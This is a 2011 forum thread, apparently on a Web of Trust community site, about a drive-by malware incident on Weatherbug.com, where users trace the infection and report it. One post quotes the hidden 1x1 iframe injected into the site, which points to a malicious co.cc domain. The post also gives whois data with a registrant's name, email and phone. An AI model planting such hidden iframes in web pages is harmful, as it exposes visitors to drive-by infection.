(The quickest way to register)

Forum

  1. User picture
    • mketsdev1 on Mon 14 Feb 2011
    • 04:36:37 AM UTC

    Weatherbug.com Malware!

    Yesterday I went in to Weatherbug.com, which I have been doing for years. I noticed a funny Java download rectangle on the screen, and then my computer started beeping as my Symantec began blocking something malicious. There were hundreds of repeat blockage messages. Then my whole desktop was taken over by a bogus "virus" scan, which froze up my whole system. I couldn't close the malware or open anything else. I shut down my system and had my son-in-law, who is an IT person, come over and it took him about 20 minutes to get rid of whatever it was......so Weatherbug has a bug! Anybody else having this problem?

Comments:

  1. User picture
    • Figure10 on Mon 14 Feb 2011
    • 05:18:56 AM UTC

    RE: Weatherbug.com Malware!

    Whatever it is, URLVoid doesn't know about it.

    I ❤ WOT

  2. User picture
    • c۞g on Mon 14 Feb 2011
    • 05:54:59 AM UTC

    RE: Weatherbug.com Malware!

    weatherbug.com has been compromised

    There is an iFrame:located in the source, from a direct visit.

    <iframe src="http://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1" style="visibility: hidden;" height="1" width="1">
    </iframe>

    That site when visited directly redirects to google.com
    with the full URL: hxxp://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1
    it loads a page requiring that Java be installed - I get "missing plug-in" warning since I keep Java disabled *always*

    If you use weatherbug, you have facility to contact their support.
    Inform them their site has been compromised.and request they remove the hidden iFrame

    Whois information for: x4fw.co.cc
    via: http://www.co.cc/whois/whois.php
    Registrar : CO.CC, INC.
    Whois Server : co.cc
    Referral URL : http://www.co.cc
    Service Type : ZONE RECORD

    Updated Date : 10-Feb-2011
    Creation Date : 10-Feb-2011
    Expiration Date : 10-Feb-2012

    Registrant
    Evgeniy Smirnov
    Moscow, Moscow
    RUSSIAN FEDERATION
    Email : evgeny.smirnov@mail.ru
    Phone : +74952583212

    Updated Date : 09-Feb-2011
    Creation Date : 09-Feb-2011

    Thanks for the alert.

    I submitted an abuse report to CO.CC to pull the domain
    http://www.co.cc/prosecution/prosecution.php
    I suggest others do the same

    Rated
    Malicious content:
    x4fw.co.cc

    [edit]

    her's a source chart image for:

    x4fwcocc.png

    ∞ - and you and I Opto, ergo sum

    • User picture
      • TNS Dude on Sun 20 Feb 2011
      • 01:31:30 AM UTC

      RE: Weatherbug.com Malware!

      If you use weatherbug, just use Yahoo Weather as an alternative until it's fixed.

      And according to VT, no antiviruses detect the content of the malicious URL.... (found out by viewing the downloaded file report)

  3. User picture
    • Satchman on Tue 15 Feb 2011
    • 04:00:39 AM UTC

    RE: Weatherbug.com Malware!

    Checking the box for a recent re-scan of the website by www.urlvoid.com shows that this site has been infected.

    Report 2011-02-15 04:17:03 (GMT 1)
    File Name weatherbug-com
    File Size 49276 bytes
    File Type Unknown file
    MD5 Hash a310f04fb9c28f16b3b7e2eb39142eff
    SHA1 Hash 40d348387481cfb4f7ffe5a89559ee7c36c6c62d
    Detections: 1 / 16 (6 %)
    Status INFECTED

    Antivirus Updated Engine Result
    a-squared 15/02/2011 5.0.0.20 -
    Avast 15/02/2011 5.0 -
    AVG 15/02/2011 9.0.0.725 -
    Avira AntiVir 15/02/2011 7.6.0.59 -
    BitDefender 15/02/2011 7.0.0.2555 -
    ClamAV 15/02/2011 0.96.2.1 -
    Comodo 15/02/2011 4.0 -
    Dr.Web 15/02/2011 5.00.0 -
    F-PROT6 15/02/2011 4.6.1.107 -
    Ikarus T3 15/02/2011 1001084 -
    Kaspersky 15/02/2011 9.0.0.736 -
    NOD32 15/02/2011 4.2.42.0 -
    Panda 15/02/2011 10.0.3.0 -
    TrendMicro 15/02/2011 9.120-1004 -
    VBA32 15/02/2011 3.12.14.1 Malware.HTML.Iframe
    VirusBuster 15/02/2011 1.5.6

    Satch

  4. User picture
    • WeatherBug1 on Tue 15 Feb 2011
    • 02:44:53 PM UTC

    RE: Weatherbug.com Malware!

    I represent WeatherBug. We have looked into this issue and could not find any offending code. Any issue was likely caused by an ad served through a third party ad network. We will be monitoring our ads to avoid any future occurrences.

  5. User picture
    • mketsdev1 on Sat 19 Feb 2011
    • 03:28:53 PM UTC

    RE: Weatherbug.com Malware!

    Thank you! I miss being able to check my local weather stations!

  6. User picture
    • Anonymous on Sat 19 Feb 2011
    • 04:28:36 PM UTC

    RE: Weatherbug.com Malware!

    Gave up on WeatherBug long time back.
    Been dangerous for years to use.
    List of reasons a mile long.

    Have some fun and Google
    http://www.google.com/search?q=weatherbug+spyware&...

    http://www.google.com/search?q=weatherbug+issues&a...

    http://www.google.com/search?q=weatherbug+malware&...

    • User picture
      • siblingshot on Sat 19 Feb 2011
      • 04:50:29 PM UTC

      RE: Weatherbug.com Malware!

      Interesting, DT.

      I use WeatherBug and noticed - from g7w's post - that it had been compromised. In light of that, and your own pointers, it may be high time to drop a little rain on this addon. Rinse my hands. Wash it away.

      The nomencluture itself is a little ironic.

  7. User picture
    • Satchman on Sat 19 Feb 2011
    • 05:59:24 PM UTC

    RE: Weatherbug.com Malware!

    I remember a history of malware from Weatherbug that goes back at least five years, maybe more. It comes and goes and the site is too much of a risk. They used to put toolbars in people's browsers that AV and scanners would diagnose as malware. There's so much better weather information and sites out there than Weatherbug. I love Yahoo Weather! Nothing to install or download and it is very detailed and accurate.

    Satch

    • User picture
      • siblingshot on Sat 19 Feb 2011
      • 06:24:01 PM UTC

      RE: Weatherbug.com Malware!

      Satch.

      Thanks for your alternative recommendation. The very thing which appealed about to me about Weatherbug - that it sits quite colourfully and (seemingly) innocuously at the foot of my browser window - is not in itself indispensable.

  8. User picture
    • Anonymous on Sat 19 Feb 2011
    • 06:20:36 PM UTC

    RE: Weatherbug.com Malware!

    I just prefer to look at metar reports, and easiest way is download this: http://www.nirsoft.net/utils/mweather.html
    The other method is to step outside. ~smiles~

  9. User picture
    • Jazspeak on Sat 19 Feb 2011
    • 09:05:56 PM UTC

    RE: Weatherbug.com Malware!

    "The other method is to step outside."

    There's nothing like getting a bit of exercise to make the day seem brighter. Oh, and if you think that the weather is bad then you are probably wearing the wrong clothing. ~double smiles~

    ~Music is not just for the Masses~

  10. User picture
    • AlphaCentauri on Sun 20 Feb 2011
    • 01:17:37 AM UTC

    RE: Weatherbug.com Malware!

    I've been using Weather Watcher for several years and like it much better than Weather Bug because it has no ads. I don't think you can get the free version anymore, though the paid subscription is only $9/year or $44/lifetime subscription.

    Yes, WOT has a wiki. Check there first for fast answers to many questions like "Why is my site rated red, and how do I fix that?"

  11. User picture
    • mketsdev1 on Sun 20 Feb 2011
    • 04:19:48 AM UTC

    RE: Weatherbug.com Malware!

    Thanks everybody! I have come to the conclusion that it just isn't worth it, even if it does have 3 reporting stations within 2 miles of my house,and I am in the center of the triangle. Since I don't have my own equipment, it makes for pretty accurate climatology.....but, I will let it go for the sake of my computer staying viable :)

    • User picture
      • c۞g on Sun 20 Feb 2011
      • 07:59:49 AM UTC

      RE: Weatherbug.com Malware!

      Spyware...
      Started off from a Microsoft mis-classification, but some AV still calssify it as "malware" even though it's simple adware.

      FYI The National Weather Service and Homeland Security use Weatherbug's resources...

      for more info: Wikipedia

      As for the compromised HTML with inserted IFRAME that started this thread...
      The IFRAME was removed the next day.
      There is no longer a threat for weather.weatherbug.com

      Anyone ever view source here?

      ∞ - and you and I Opto, ergo sum

  12. User picture
    • tellonem on Sun 20 Feb 2011
    • 08:46:41 AM UTC

    RE: Weatherbug.com Malware!

    Myself use Accuweather or weather.com. Usefulness of weather bug toggles.

    "Bri" for short. Surf safely.